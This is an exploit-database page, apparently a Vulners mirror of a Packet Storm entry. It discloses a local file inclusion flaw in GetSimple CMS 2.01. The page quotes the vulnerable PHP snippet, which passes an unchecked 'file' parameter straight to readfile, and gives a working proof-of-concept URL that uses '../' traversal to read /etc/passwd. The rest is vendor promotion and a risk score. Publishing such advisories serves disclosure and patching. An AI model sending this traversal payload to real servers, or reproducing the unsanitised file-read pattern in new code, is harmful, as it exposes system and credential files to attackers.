Lucene search
K

GetSimple 2.01 Local File Inclusion

🗓️ 07 May 2010 00:00:00Reported by BatchType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 15 Views

GetSimple 2.01 Local File Inclusion vulnerabilit

Code
`# Exploit Title: GetSimple 2.01 LFI  
# Date: 4/5/2010  
# Author: Batch  
# Software Link: http://www.box.net/get-simple  
# Version: 2.01  
  
#Special Conditions: Must be admin.  
# Code :   
  
...  
  
# get file  
if (file_exists($_GET['file'])) {  
readfile($_GET['file'], 'r');  
}  
exit;  
  
...  
  
  
http://localhost/GetSimple_2.01/admin/download.php?file=../../../../../etc/passwd  
  
#-Batch  
  
#ryan1918.com  
#Everyone else.  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 May 2010 00:00Current
0.1Low risk
Vulners AI Score0.1
15